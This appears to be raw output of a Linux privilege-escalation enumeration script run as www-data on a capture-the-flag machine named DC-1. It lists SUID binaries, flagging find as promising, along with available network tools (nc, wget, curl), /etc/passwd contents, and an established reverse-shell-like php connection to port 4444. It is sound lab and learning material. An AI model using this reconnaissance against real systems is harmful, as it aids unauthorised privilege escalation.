 420 lrwxrwxrwx 1 root root       34 May 30  2018 /usr/sbin/apache2 -> ../lib/apache2/mpm-prefork/apache2
 421 -rwxr-xr-x 1 root root    21812 Oct  4  2014 /usr/sbin/atd
 422 -rwxr-xr-x 1 root root    43020 Jul  4  2012 /usr/sbin/cron
 423 -rwsr-xr-x 1 root root   937564 Feb 11  2018 /usr/sbin/exim4
 424 -rwxr-xr-x 1 root root 10585256 Apr 20  2018 /usr/sbin/mysqld
 425 -rwxr-xr-x 1 root root    28832 May 22  2013 /usr/sbin/rpc.idmapd
 426 -rwxr-xr-x 1 root root   388200 Oct  8  2014 /usr/sbin/rsyslogd
 427 -rwxr-xr-x 1 root root   531888 Jan 27  2018 /usr/sbin/sshd
 428 
 429 
 430 [-] /etc/init.d/ binary permissions:
 431 total 280
 432 drwxr-xr-x  2 root root 4096 Feb 19 23:01 .
 433 drwxr-xr-x 85 root root 4096 May  7 00:08 ..
 434 -rw-r--r--  1 root root 1586 Feb 19 23:02 .depend.boot
 435 -rw-r--r--  1 root root  669 Feb 19 23:02 .depend.start
 436 -rw-r--r--  1 root root  769 Feb 19 23:02 .depend.stop
 437 -rw-r--r--  1 root root 2427 Oct 16  2012 README
 438 -rwxr-xr-x  1 root root 2227 Apr 16  2013 acpid
 439 -rwxr-xr-x  1 root root 7820 May 26  2018 apache2
 440 -rwxr-xr-x  1 root root 1071 Jun 25  2011 atd
 441 -rwxr-xr-x  1 root root 1276 Oct 16  2012 bootlogs
 442 -rwxr-xr-x  1 root root 1281 Jul 15  2013 bootmisc.sh
 443 -rwxr-xr-x  1 root root 3816 Jul 15  2013 checkfs.sh
 444 -rwxr-xr-x  1 root root 1099 Jul 15  2013 checkroot-bootclean.sh
 445 -rwxr-xr-x  1 root root 9673 Jul 15  2013 checkroot.sh
 446 -rwxr-xr-x  1 root root 1379 Dec  9  2011 console-setup
 447 -rwxr-xr-x  1 root root 3033 Jul  3  2012 cron
 448 -rwxr-xr-x  1 root root 2813 Feb  6  2015 dbus
 449 -rwxr-xr-x  1 root root 6435 Feb 11  2018 exim4
 450 -rwxr-xr-x  1 root root 1329 Oct 16  2012 halt
 451 -rwxr-xr-x  1 root root 1423 Oct 16  2012 hostname.sh
 452 -rwxr-xr-x  1 root root 3880 Dec 10  2012 hwclock.sh
 453 -rwxr-xr-x  1 root root 7592 Apr 28  2012 kbd
 454 -rwxr-xr-x  1 root root 1591 Oct  1  2012 keyboard-setup
 455 -rwxr-xr-x  1 root root 1293 Oct 16  2012 killprocs
 456 -rwxr-xr-x  1 root root 1990 May 21  2012 kmod
 457 -rwxr-xr-x  1 root root 2405 Sep 26  2016 mcstrans
 458 -rwxr-xr-x  1 root root  995 Oct 16  2012 motd
 459 -rwxr-xr-x  1 root root  670 Feb 24  2013 mountall-bootclean.sh
 460 -rwxr-xr-x  1 root root 2128 Feb 24  2013 mountall.sh
 461 -rwxr-xr-x  1 root root 1508 Jul 15  2013 mountdevsubfs.sh
 462 -rwxr-xr-x  1 root root 1413 Jul 15  2013 mountkernfs.sh
 463 -rwxr-xr-x  1 root root  678 Feb 24  2013 mountnfs-bootclean.sh
 464 -rwxr-xr-x  1 root root 2440 Oct 16  2012 mountnfs.sh
 465 -rwxr-xr-x  1 root root 1731 Jul 15  2013 mtab.sh
 466 -rwxr-xr-x  1 root root 5437 Apr 19  2018 mysql
 467 -rwxr-xr-x  1 root root 4322 Mar 14  2013 networking
 468 -rwxr-xr-x  1 root root 6491 May 22  2013 nfs-common
 469 -rwxr-xr-x  1 root root 1346 May 20  2012 procps
 470 -rwxr-xr-x  1 root root 6120 Oct 16  2012 rc
 471 -rwxr-xr-x  1 root root  782 Oct 16  2012 rc.local
 472 -rwxr-xr-x  1 root root  117 Oct 16  2012 rcS
 473 -rwxr-xr-x  1 root root  639 Oct 16  2012 reboot
 474 -rwxr-xr-x  1 root root 2727 Sep 26  2016 restorecond
 475 -rwxr-xr-x  1 root root 1074 Jul 15  2013 rmnologin
 476 -rwxr-xr-x  1 root root 2344 May 10  2017 rpcbind
 477 -rwxr-xr-x  1 root root 3054 Oct  8  2014 rsyslog
 478 -rwxr-xr-x  1 root root 3200 Oct 16  2012 sendsigs
 479 -rwxr-xr-x  1 root root  590 Oct 16  2012 single
 480 -rw-r--r--  1 root root 4290 Oct 16  2012 skeleton
 481 -rwxr-xr-x  1 root root 3881 Apr 15  2016 ssh
 482 -rwxr-xr-x  1 root root 8827 Nov  9  2012 udev
 483 -rwxr-xr-x  1 root root 1179 Aug 20  2012 udev-mtab
 484 -rwxr-xr-x  1 root root 2721 Apr 10  2013 umountfs
 485 -rwxr-xr-x  1 root root 2195 Apr 10  2013 umountnfs.sh
 486 -rwxr-xr-x  1 root root 1122 Oct 16  2012 umountroot
 487 -rwxr-xr-x  1 root root 3111 Oct 16  2012 urandom
 488 -rwxr-xr-x  1 root root 1364 Oct 26  2015 virtualbox-guest-utils
 489 -rwxr-xr-x  1 root root 2666 Mar  3  2012 x11-common
 490 
 491 
 492 [-] /etc/init/ config file permissions:
 493 total 48
 494 drwxr-xr-x  2 root root 4096 Feb 19 22:25 .
 495 drwxr-xr-x 85 root root 4096 May  7 00:08 ..
 496 -rw-r--r--  1 root root  523 Mar 14  2013 network-interface-container.conf
 497 -rw-r--r--  1 root root 1603 Mar 14  2013 network-interface-security.conf
 498 -rw-r--r--  1 root root  803 Mar 14  2013 network-interface.conf
 499 -rw-r--r--  1 root root 1898 Mar 14  2013 networking.conf
 500 -rw-r--r--  1 root root  567 Feb 24  2013 startpar-bridge.conf
 501 -rw-r--r--  1 root root  637 Nov  5  2012 udev-fallback-graphics.conf
 502 -rw-r--r--  1 root root  769 Nov  5  2012 udev-finish.conf
 503 -rw-r--r--  1 root root  322 Nov  5  2012 udev.conf
 504 -rw-r--r--  1 root root  356 Nov  5  2012 udevmonitor.conf
 505 -rw-r--r--  1 root root  352 Nov  5  2012 udevtrigger.conf
 506 
 507 
 508 [-] /lib/systemd/* config file permissions:
 509 /lib/systemd/:
 510 total 4.0K
 511 drwxr-xr-x 6 root root 4.0K Feb 19 22:43 system
 512 
 513 /lib/systemd/system:
 514 total 56K
 515 drwxr-xr-x 2 root root 4.0K Feb 19 22:43 dbus.target.wants
 516 drwxr-xr-x 2 root root 4.0K Feb 19 22:43 multi-user.target.wants
 517 drwxr-xr-x 2 root root 4.0K Feb 19 22:43 sockets.target.wants
 518 drwxr-xr-x 2 root root 4.0K Feb 19 22:25 basic.target.wants
 519 -rw-r--r-- 1 root root  353 Feb 10  2015 dbus.service
 520 -rw-r--r-- 1 root root  106 Feb 10  2015 dbus.socket
 521 -rw-r--r-- 1 root root  190 Oct  8  2014 rsyslog.service
 522 -rw-r--r-- 1 root root  164 Apr 29  2013 udev-control.socket
 523 -rw-r--r-- 1 root root  177 Apr 29  2013 udev-kernel.socket
 524 -rw-r--r-- 1 root root  752 Apr 29  2013 udev-settle.service
 525 -rw-r--r-- 1 root root  291 Apr 29  2013 udev-trigger.service
 526 -rw-r--r-- 1 root root  384 Apr 29  2013 udev.service
 527 -rw-r--r-- 1 root root  155 Apr 16  2013 acpid.service
 528 -rw-r--r-- 1 root root  115 Apr 16  2013 acpid.socket
 529 
 530 /lib/systemd/system/dbus.target.wants:
 531 total 0
 532 lrwxrwxrwx 1 root root 14 Feb 10  2015 dbus.socket -> ../dbus.socket
 533 
 534 /lib/systemd/system/multi-user.target.wants:
 535 total 0
 536 lrwxrwxrwx 1 root root 15 Feb 10  2015 dbus.service -> ../dbus.service
 537 
 538 /lib/systemd/system/sockets.target.wants:
 539 total 0
 540 lrwxrwxrwx 1 root root 14 Feb 10  2015 dbus.socket -> ../dbus.socket
 541 lrwxrwxrwx 1 root root 22 Apr 29  2013 udev-control.socket -> ../udev-control.socket
 542 lrwxrwxrwx 1 root root 21 Apr 29  2013 udev-kernel.socket -> ../udev-kernel.socket
 543 
 544 /lib/systemd/system/basic.target.wants:
 545 total 0
 546 lrwxrwxrwx 1 root root 23 Apr 29  2013 udev-trigger.service -> ../udev-trigger.service
 547 lrwxrwxrwx 1 root root 15 Apr 29  2013 udev.service -> ../udev.service
 548 
 549 
 550 ### SOFTWARE #############################################
 551 [-] MYSQL version:
 552 mysql  Ver 14.14 Distrib 5.5.60, for debian-linux-gnu (i686) using readline 6.2
 553 
 554 
 555 [-] Apache user configuration:
 556 APACHE_RUN_USER=www-data
 557 APACHE_RUN_GROUP=www-data
 558 
 559 
 560 ### INTERESTING FILES ####################################
 561 [-] Useful file locations:
 562 /bin/nc
 563 /bin/netcat
 564 /usr/bin/wget
 565 /usr/bin/gcc
 566 /usr/bin/curl
 567 
 568 
 569 [-] Installed compilers:
 570 ii  checkpolicy                        2.1.8-2                          i386         SELinux policy compiler
 571 ii  gcc                                4:4.7.2-1                        i386         GNU C compiler
 572 ii  gcc-4.7                            4.7.2-5                          i386         GNU C compiler
 573 ii  gcc-4.7-multilib                   4.7.2-5                          i386         GNU C compiler (multilib files)
 574 ii  gcc-multilib                       4:4.7.2-1                        i386         GNU C compiler (multilib files)
 575 
 576 
 577 [-] Can we read/write sensitive files:
 578 -rw-r--r-- 1 root root 1057 Feb 19 23:51 /etc/passwd
 579 -rw-r--r-- 1 root root 612 Feb 19 23:51 /etc/group
 580 -rw-r--r-- 1 root root 851 Jul 30  2011 /etc/profile
 581 -rw-r----- 1 root shadow 870 Feb 28 12:10 /etc/shadow
 582 
 583 
 584 [-] SUID files:
 585 -rwsr-xr-x 1 root root 88744 Dec 10  2012 /bin/mount
 586 -rwsr-xr-x 1 root root 31104 Apr 13  2011 /bin/ping
 587 -rwsr-xr-x 1 root root 35200 Feb 27  2017 /bin/su
 588 -rwsr-xr-x 1 root root 35252 Apr 13  2011 /bin/ping6
 589 -rwsr-xr-x 1 root root 67704 Dec 10  2012 /bin/umount
 590 -rwsr-sr-x 1 daemon daemon 50652 Oct  4  2014 /usr/bin/at
 591 -rwsr-xr-x 1 root root 35892 Feb 27  2017 /usr/bin/chsh
 592 -rwsr-xr-x 1 root root 45396 Feb 27  2017 /usr/bin/passwd
 593 -rwsr-xr-x 1 root root 30880 Feb 27  2017 /usr/bin/newgrp
 594 -rwsr-xr-x 1 root root 44564 Feb 27  2017 /usr/bin/chfn
 595 -rwsr-xr-x 1 root root 66196 Feb 27  2017 /usr/bin/gpasswd
 596 -rwsr-sr-x 1 root mail 83912 Nov 18  2017 /usr/bin/procmail
 597 -rwsr-xr-x 1 root root 162424 Jan  6  2012 /usr/bin/find
 598 -rwsr-xr-x 1 root root 937564 Feb 11  2018 /usr/sbin/exim4
 599 -rwsr-xr-x 1 root root 9660 Jun 20  2017 /usr/lib/pt_chown
 600 -rwsr-xr-x 1 root root 248036 Jan 27  2018 /usr/lib/openssh/ssh-keysign
 601 -rwsr-xr-x 1 root root 5412 Mar 28  2017 /usr/lib/eject/dmcrypt-get-device
 602 -rwsr-xr-- 1 root messagebus 321692 Feb 10  2015 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
 603 -rwsr-xr-x 1 root root 84532 May 22  2013 /sbin/mount.nfs
 604 
 605 
 606 [+] Possibly interesting SUID files:
 607 -rwsr-xr-x 1 root root 162424 Jan  6  2012 /usr/bin/find
 608 
 609 
 610 [-] SGID files:
 611 -rwxr-sr-x 1 root ssh 128396 Jan 27  2018 /usr/bin/ssh-agent
 612 -rwsr-sr-x 1 daemon daemon 50652 Oct  4  2014 /usr/bin/at
 613 -rwxr-sr-x 1 root mlocate 30492 Sep 25  2010 /usr/bin/mlocate
 614 -rwxr-sr-x 1 root mail 17908 Nov 18  2017 /usr/bin/lockfile
 615 -rwxr-sr-x 1 root shadow 49364 Feb 27  2017 /usr/bin/chage
 616 -rwxr-sr-x 1 root tty 9708 Jun 11  2012 /usr/bin/bsd-write
 617 -rwxr-sr-x 1 root mail 9768 Nov 30  2014 /usr/bin/mutt_dotlock
 618 -rwxr-sr-x 1 root tty 18020 Dec 10  2012 /usr/bin/wall
 619 -rwxr-sr-x 1 root crontab 34760 Jul  4  2012 /usr/bin/crontab
 620 -rwxr-sr-x 1 root shadow 18168 Feb 27  2017 /usr/bin/expiry
 621 -rwsr-sr-x 1 root mail 83912 Nov 18  2017 /usr/bin/procmail
 622 -rwxr-sr-x 1 root mail 13960 Dec 12  2012 /usr/bin/dotlockfile
 623 -rwxr-sr-x 1 root utmp 4972 Feb 21  2011 /usr/lib/utempter/utempter
 624 -rwxr-sr-x 1 root shadow 30332 May  5  2012 /sbin/unix_chkpwd
 625 
 626 
 627 [-] Can't search *.conf files as no keyword was entered
 628 
 629 [-] Can't search *.php files as no keyword was entered
 630 
 631 [-] Can't search *.log files as no keyword was entered
 632 
 633 [-] Can't search *.ini files as no keyword was entered
 634 
 635 [-] All *.conf files in /etc (recursive 1 level):
 636 -rw-r--r-- 1 root root 45 May  7 01:08 /etc/resolv.conf
 637 -rw-r--r-- 1 root root 346 Mar 31  2012 /etc/discover-modprobe.conf
 638 -rw-r--r-- 1 root root 216 Sep 26  2016 /etc/sestatus.conf
 639 -rw-r--r-- 1 root root 1260 May 30  2008 /etc/ucf.conf
 640 -rw-r--r-- 1 root root 834 Jun  8  2012 /etc/gssapi_mech.conf
 641 -rw-r--r-- 1 root root 859 Nov 24  2012 /etc/insserv.conf
 642 -rw-r--r-- 1 root root 144 Feb 19 22:55 /etc/kernel-img.conf
 643 -rw-r--r-- 1 root root 3173 Dec 16  2017 /etc/reportbug.conf
 644 -rw-r--r-- 1 root root 599 Feb 19  2009 /etc/logrotate.conf
 645 -rw-r--r-- 1 root root 6895 Feb 19 22:44 /etc/ca-certificates.conf
 646 -rw-r--r-- 1 root root 284 Sep 25  2010 /etc/updatedb.conf
 647 -rw-r--r-- 1 root root 191 Feb  1  2012 /etc/libaudit.conf
 648 -rw-r--r-- 1 root root 604 May 16  2012 /etc/deluser.conf
 649 -rw-r--r-- 1 root root 2940 Feb 12  2016 /etc/gai.conf
 650 -rw-r--r-- 1 root root 2632 Oct  8  2014 /etc/rsyslog.conf
 651 -rw-r--r-- 1 root root 2082 May 20  2012 /etc/sysctl.conf
 652 -rw-r--r-- 1 root root 214 May 11  2013 /etc/idmapd.conf
 653 -rw-r--r-- 1 root root 956 Feb 22  2015 /etc/mke2fs.conf
 654 -rw-r--r-- 1 root root 552 Apr 30  2012 /etc/pam.conf
 655 -rw-r--r-- 1 root root 2981 Feb 19 22:25 /etc/adduser.conf
 656 -rw-r--r-- 1 root root 2969 Dec 26  2012 /etc/debconf.conf
 657 -rw-r--r-- 1 root root 9 Aug  8  2006 /etc/host.conf
 658 -rw-r--r-- 1 root root 34 Feb 19 22:24 /etc/ld.so.conf
 659 -rw-r--r-- 1 root root 475 Aug 29  2006 /etc/nsswitch.conf
 660 
 661 
 662 [-] Location and contents (if accessible) of .bash_history file(s):
 663 /home/flag4/.bash_history
 664 cd 
 665 ls
 666 vi flag4.txt
 667 ls
 668 exit
 669 
 670 
 671 [-] Any interesting mail in /var/mail:
 672 total 8
 673 drwxrwsr-x  2 root mail 4096 Feb 19 22:24 .
 674 drwxr-xr-x 12 root root 4096 Feb 19 23:10 ..
 675 
 676 
 677 ### SCAN COMPLETE ####################################
 678 
 679 #########################################################
 680 # Local Linux Enumeration & Privilege Escalation Script #
 681 #########################################################
 682 # www.rebootuser.com
 683 # version 0.95
 684 
 685 [-] Debug Info
 686 [+] Thorough tests = Disabled
 687 
 688 
 689 Scan started at:
 690 Tue May  7 01:08:52 AEST 2019
 691 
 692 
 693 ### SYSTEM ##############################################
 694 [-] Kernel information:
 695 Linux DC-1 3.2.0-6-486 #1 Debian 3.2.102-1 i686 GNU/Linux
 696 
 697 
 698 [-] Kernel information (continued):
 699 Linux version 3.2.0-6-486 (debian-kernel@lists.debian.org) (gcc version 4.9.2 (Debian 4.9.2-10+deb7u1) ) #1 Debian 3.2.102-1
 700 
 701 
 702 [-] Specific release information:
 703 PRETTY_NAME="Debian GNU/Linux 7 (wheezy)"
 704 NAME="Debian GNU/Linux"
 705 VERSION_ID="7"
 706 VERSION="7 (wheezy)"
 707 ID=debian
 708 ANSI_COLOR="1;31"
 709 HOME_URL="http://www.debian.org/"
 710 SUPPORT_URL="http://www.debian.org/support/"
 711 BUG_REPORT_URL="http://bugs.debian.org/"
 712 
 713 
 714 [-] Hostname:
 715 DC-1
 716 
 717 
 718 ### USER/GROUP ##########################################
 719 [-] Current user/group info:
 720 uid=33(www-data) gid=33(www-data) groups=33(www-data)
 721 
 722 
 723 [-] Users that have previously logged onto the system:
 724 Username         Port     From             Latest
 725 root             tty1                      Thu Feb 28 12:10:51 +1000 2019
 726 
 727 
 728 [-] Who else is logged on:
 729  01:08:52 up  1:00,  0 users,  load average: 0.00, 0.00, 0.00
 730 USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
 731 
 732 
 733 [-] Group memberships:
 734 uid=0(root) gid=0(root) groups=0(root)
 735 uid=1(daemon) gid=1(daemon) groups=1(daemon)
 736 uid=2(bin) gid=2(bin) groups=2(bin)
 737 uid=3(sys) gid=3(sys) groups=3(sys)
 738 uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
 739 uid=5(games) gid=60(games) groups=60(games)
 740 uid=6(man) gid=12(man) groups=12(man)
 741 uid=7(lp) gid=7(lp) groups=7(lp)
 742 uid=8(mail) gid=8(mail) groups=8(mail)
 743 uid=9(news) gid=9(news) groups=9(news)
 744 uid=10(uucp) gid=10(uucp) groups=10(uucp)
 745 uid=13(proxy) gid=13(proxy) groups=13(proxy)
 746 uid=33(www-data) gid=33(www-data) groups=33(www-data)
 747 uid=34(backup) gid=34(backup) groups=34(backup)
 748 uid=38(list) gid=38(list) groups=38(list)
 749 uid=39(irc) gid=39(irc) groups=39(irc)
 750 uid=41(gnats) gid=41(gnats) groups=41(gnats)
 751 uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
 752 uid=100(libuuid) gid=101(libuuid) groups=101(libuuid)
 753 uid=101(Debian-exim) gid=104(Debian-exim) groups=104(Debian-exim)
 754 uid=102(statd) gid=65534(nogroup) groups=65534(nogroup)
 755 uid=103(messagebus) gid=107(messagebus) groups=107(messagebus)
 756 uid=104(sshd) gid=65534(nogroup) groups=65534(nogroup)
 757 uid=105(mysql) gid=109(mysql) groups=109(mysql)
 758 uid=1001(flag4) gid=1001(flag4) groups=1001(flag4)
 759 
 760 
 761 [-] Contents of /etc/passwd:
 762 root:x:0:0:root:/root:/bin/bash
 763 daemon:x:1:1:daemon:/usr/sbin:/bin/sh
 764 bin:x:2:2:bin:/bin:/bin/sh
 765 sys:x:3:3:sys:/dev:/bin/sh
 766 sync:x:4:65534:sync:/bin:/bin/sync
 767 games:x:5:60:games:/usr/games:/bin/sh
 768 man:x:6:12:man:/var/cache/man:/bin/sh
 769 lp:x:7:7:lp:/var/spool/lpd:/bin/sh
 770 mail:x:8:8:mail:/var/mail:/bin/sh
 771 news:x:9:9:news:/var/spool/news:/bin/sh
 772 uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
 773 proxy:x:13:13:proxy:/bin:/bin/sh
 774 www-data:x:33:33:www-data:/var/www:/bin/sh
 775 backup:x:34:34:backup:/var/backups:/bin/sh
 776 list:x:38:38:Mailing List Manager:/var/list:/bin/sh
 777 irc:x:39:39:ircd:/var/run/ircd:/bin/sh
 778 gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
 779 nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
 780 libuuid:x:100:101::/var/lib/libuuid:/bin/sh
 781 Debian-exim:x:101:104::/var/spool/exim4:/bin/false
 782 statd:x:102:65534::/var/lib/nfs:/bin/false
 783 messagebus:x:103:107::/var/run/dbus:/bin/false
 784 sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
 785 mysql:x:105:109:MySQL Server,,,:/nonexistent:/bin/false
 786 flag4:x:1001:1001:Flag4,,,:/home/flag4:/bin/bash
 787 
 788 
 789 [-] Super user account(s):
 790 root
 791 
 792 
 793 [-] Are permissions on /home directories lax:
 794 total 12K
 795 drwxr-xr-x  3 root  root  4.0K Feb 19 23:51 .
 796 drwxr-xr-x 23 root  root  4.0K Feb 19 22:34 ..
 797 drwxr-xr-x  2 flag4 flag4 4.0K Feb 19 23:28 flag4
 798 
 799 
 800 [-] Root is allowed to login via SSH:
 801 PermitRootLogin yes
 802 
 803 
 804 ### ENVIRONMENTAL #######################################
 805 [-] Environment information:
 806 APACHE_PID_FILE=/var/run/apache2.pid
 807 APACHE_RUN_USER=www-data
 808 APACHE_LOG_DIR=/var/log/apache2
 809 PATH=/usr/local/bin:/usr/bin:/bin
 810 PWD=/var/www
 811 APACHE_RUN_GROUP=www-data
 812 LANG=C
 813 SHLVL=1
 814 APACHE_LOCK_DIR=/var/lock/apache2
 815 APACHE_RUN_DIR=/var/run/apache2
 816 _=/usr/bin/env
 817 
 818 
 819 [-] Path information:
 820 /usr/local/bin:/usr/bin:/bin
 821 
 822 
 823 [-] Available shells:
 824 # /etc/shells: valid login shells
 825 /bin/sh
 826 /bin/dash
 827 /bin/bash
 828 /bin/rbash
 829 
 830 
 831 [-] Current umask value:
 832 0022
 833 u=rwx,g=rx,o=rx
 834 
 835 
 836 [-] umask value as specified in /etc/login.defs:
 837 UMASK        022
 838 
 839 
 840 [-] Password and storage information:
 841 PASS_MAX_DAYS    99999
 842 PASS_MIN_DAYS    0
 843 PASS_WARN_AGE    7
 844 ENCRYPT_METHOD SHA512
 845 
 846 
 847 ### JOBS/TASKS ##########################################
 848 [-] Cron jobs:
 849 -rw-r--r-- 1 root root  722 Jul  4  2012 /etc/crontab
 850 
 851 /etc/cron.d:
 852 total 16
 853 drwxr-xr-x  2 root root 4096 Feb 19 23:01 .
 854 drwxr-xr-x 85 root root 4096 May  7 01:08 ..
 855 -rw-r--r--  1 root root  102 Jul  4  2012 .placeholder
 856 -rw-r--r--  1 root root  510 May 10  2018 php5
 857 
 858 /etc/cron.daily:
 859 total 68
 860 drwxr-xr-x  2 root root  4096 Feb 19 23:01 .
 861 drwxr-xr-x 85 root root  4096 May  7 01:08 ..
 862 -rw-r--r--  1 root root   102 Jul  4  2012 .placeholder
 863 -rwxr-xr-x  1 root root   633 May 30  2018 apache2
 864 -rwxr-xr-x  1 root root 14985 Oct 24  2014 apt
 865 -rwxr-xr-x  1 root root   314 Nov  5  2012 aptitude
 866 -rwxr-xr-x  1 root root   355 Jun 11  2012 bsdmainutils
 867 -rwxr-xr-x  1 root root   256 May  3  2016 dpkg
 868 -rwxr-xr-x  1 root root  4125 Feb 11  2018 exim4-base
 869 -rwxr-xr-x  1 root root    89 May 17  2012 logrotate
 870 -rwxr-xr-x  1 root root  1365 Jun 19  2012 man-db
 871 -rwxr-xr-x  1 root root   606 Sep 25  2010 mlocate
 872 -rwxr-xr-x  1 root root   249 May 26  2012 passwd
 873 
 874 /etc/cron.hourly:
 875 total 12
 876 drwxr-xr-x  2 root root 4096 Feb 19 22:25 .
 877 drwxr-xr-x 85 root root 4096 May  7 01:08 ..
 878 -rw-r--r--  1 root root  102 Jul  4  2012 .placeholder
 879 
 880 /etc/cron.monthly:
 881 total 12
 882 drwxr-xr-x  2 root root 4096 Feb 19 22:25 .
 883 drwxr-xr-x 85 root root 4096 May  7 01:08 ..
 884 -rw-r--r--  1 root root  102 Jul  4  2012 .placeholder
 885 
 886 /etc/cron.weekly:
 887 total 16
 888 drwxr-xr-x  2 root root 4096 Feb 19 22:25 .
 889 drwxr-xr-x 85 root root 4096 May  7 01:08 ..
 890 -rw-r--r--  1 root root  102 Jul  4  2012 .placeholder
 891 -rwxr-xr-x  1 root root  907 Jun 19  2012 man-db
 892 
 893 
 894 [-] Crontab contents:
 895 # /etc/crontab: system-wide crontab
 896 # Unlike any other crontab you don't have to run the `crontab'
 897 # command to install the new version when you edit this file
 898 # and files in /etc/cron.d. These files also have username fields,
 899 # that none of the other crontabs do.
 900 
 901 SHELL=/bin/sh
 902 PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
 903 
 904 # m h dom mon dow user    command
 905 17 *    * * *    root    cd / && run-parts --report /etc/cron.hourly
 906 25 6    * * *    root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
 907 47 6    * * 7    root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
 908 52 6    1 * *    root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
 909 #
 910 
 911 
 912 ### NETWORKING  ##########################################
 913 [-] Network and IP info:
 914 eth0      Link encap:Ethernet  HWaddr 00:0c:29:d1:f4:98  
 915           inet addr:192.168.16.107  Bcast:192.168.16.255  Mask:255.255.255.0
 916           inet6 addr: fe80::20c:29ff:fed1:f498/64 Scope:Link
 917           UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
 918           RX packets:8711 errors:0 dropped:0 overruns:0 frame:0
 919           TX packets:3014 errors:0 dropped:0 overruns:0 carrier:0
 920           collisions:0 txqueuelen:1000 
 921           RX bytes:1327204 (1.2 MiB)  TX bytes:1104845 (1.0 MiB)
 922 
 923 lo        Link encap:Local Loopback  
 924           inet addr:127.0.0.1  Mask:255.0.0.0
 925           inet6 addr: ::1/128 Scope:Host
 926           UP LOOPBACK RUNNING  MTU:16436  Metric:1
 927           RX packets:50 errors:0 dropped:0 overruns:0 frame:0
 928           TX packets:50 errors:0 dropped:0 overruns:0 carrier:0
 929           collisions:0 txqueuelen:0 
 930           RX bytes:4852 (4.7 KiB)  TX bytes:4852 (4.7 KiB)
 931 
 932 
 933 [-] ARP history:
 934 192.168.16.112 dev eth0  INCOMPLETE
 935 
 936 
 937 [-] Nameserver(s):
 938 nameserver 192.168.16.254
 939 nameserver 0.0.0.0
 940 
 941 
 942 [-] Default route:
 943 default via 192.168.16.254 dev eth0 
 944 
 945 
 946 [-] Listening TCP:
 947 Active Internet connections (servers and established)
 948 Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
 949 tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -               
 950 tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      -               
 951 tcp        0      0 0.0.0.0:40858           0.0.0.0:*               LISTEN      -               
 952 tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -               
 953 tcp        0      0 0.0.0.0:111             0.0.0.0:*               LISTEN      -               
 954 tcp        0    480 192.168.16.107:33469    192.168.16.112:4444     ESTABLISHED 3406/php        
 955 tcp6       0      0 :::22                   :::*                    LISTEN      -               
 956 tcp6       0      0 ::1:25                  :::*                    LISTEN      -               
 957 tcp6       0      0 :::34190                :::*                    LISTEN      -               
 958 tcp6       0      0 :::111                  :::*                    LISTEN      -               
 959 tcp6       0      0 :::80                   :::*                    LISTEN      -               
 960 tcp6       0      0 192.168.16.107:80       192.168.16.112:52090    TIME_WAIT   -               
 961 tcp6       1      0 192.168.16.107:80       192.168.16.112:63539    CLOSE_WAIT  -               
 962 
 963 
 964 [-] Listening UDP:
 965 Active Internet connections (servers and established)
 966 Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
 967 udp        0      0 0.0.0.0:59942           0.0.0.0:*                           -               
 968 udp        0      0 0.0.0.0:68              0.0.0.0:*                           -               
 969 udp        0      0 0.0.0.0:111             0.0.0.0:*                           -               
 970 udp        0      0 0.0.0.0:769             0.0.0.0:*                           -               
 971 udp        0      0 127.0.0.1:801           0.0.0.0:*                           -               
 972 udp        0      0 0.0.0.0:21881           0.0.0.0:*                           -               
 973 udp6       0      0 :::52815                :::*                                -               
 974 udp6       0      0 :::28256                :::*                                -               
 975 udp6       0      0 :::111                  :::*                                -               
 976 udp6       0      0 :::769                  :::*                                -               
 977 
 978 
 979 ### SERVICES #############################################
 980 [-] Running processes:
 981 USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
 982 root         1  0.0  0.0   2296   780 ?        Ss   00:08   0:01 init [2]  
 983 root         2  0.0  0.0      0     0 ?        S    00:08   0:00 [kthreadd]
 984 root         3  0.0  0.0      0     0 ?        S    00:08   0:00 [ksoftirqd/0]
 985 root         4  0.0  0.0      0     0 ?        S    00:08   0:00 [kworker/0:0]
 986 root         6  0.0  0.0      0     0 ?        S    00:08   0:00 [watchdog/0]
 987 root         7  0.0  0.0      0     0 ?        S<   00:08   0:00 [cpuset]
 988 root         8  0.0  0.0      0     0 ?        S<   00:08   0:00 [khelper]
 989 root         9  0.0  0.0      0     0 ?        S    00:08   0:00 [kdevtmpfs]
 990 root        10  0.0  0.0      0     0 ?        S<   00:08   0:00 [netns]
 991 root        11  0.0  0.0      0     0 ?        S    00:08   0:00 [sync_supers]
 992 root        12  0.0  0.0      0     0 ?        S    00:08   0:00 [bdi-default]
 993 root        13  0.0  0.0      0     0 ?        S<   00:08   0:00 [kintegrityd]
 994 root        14  0.0  0.0      0     0 ?        S<   00:08   0:00 [kblockd]
 995 root        15  0.0  0.0      0     0 ?        S    00:08   0:00 [khungtaskd]
 996 root        16  0.0  0.0      0     0 ?        S    00:08   0:00 [kswapd0]
 997 root        17  0.0  0.0      0     0 ?        SN   00:08   0:00 [ksmd]
 998 root        18  0.0  0.0      0     0 ?        S    00:08   0:00 [fsnotify_mark]
 999 root        19  0.0  0.0      0     0 ?        S<   00:08   0:00 [crypto]
1000 root        95  0.0  0.0      0     0 ?        S    00:08   0:00 [khubd]
1001 root       105  0.0  0.0      0     0 ?        S<   00:08   0:00 [ata_sff]
1002 root       115  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_0]
1003 root       125  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_1]
